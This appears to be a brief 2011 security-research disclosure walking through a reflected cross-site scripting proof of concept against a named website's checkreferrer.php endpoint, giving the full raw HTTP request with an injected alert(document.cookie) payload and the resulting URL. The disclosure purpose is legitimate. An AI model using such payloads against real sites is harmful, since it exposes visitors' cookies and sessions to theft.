Hoyt LLC Research Boston, MA US Feb 26, 2011 Re: Walk Thru for PoC Using a Tool such as Burp Suite Pro, ZAPROXY or other HTTP Tool by which to issue a GET Issue a GET using the following: GET /en/api/checkreferrer.phpa0d30'-alert(document.cookie)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243%3A%3A0%3A%3A%3A%3Aen&vserverRef= HTTP/1.1 Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com/en/ X-Requested-With: XMLHttpRequest Accept: text/html, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=165779128.1298770635.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165779128.1798479609.1298770635.1298770635.1298770635.1; __utmc=165779128; __utmb=165779128.1.10.1298770635 The Application will respond with a standard form of Alert Window displaying the document.cookie The Resultant URI is expressed as http://www.watchmouse.com/en/api/checkreferrer.phpa0d30'-alert(document.cookie)-'ef346e3dbf0?vjsRef=&vref_string=173.193.214.243::0::::en&vserverRef= Please also be advised that all PoC code and reports should be viewed is Vulnerability Execution Research and reviewed by the a senior developer or security team. Hoyt LLC Research aids a Site listed in the XSS DB free of charge.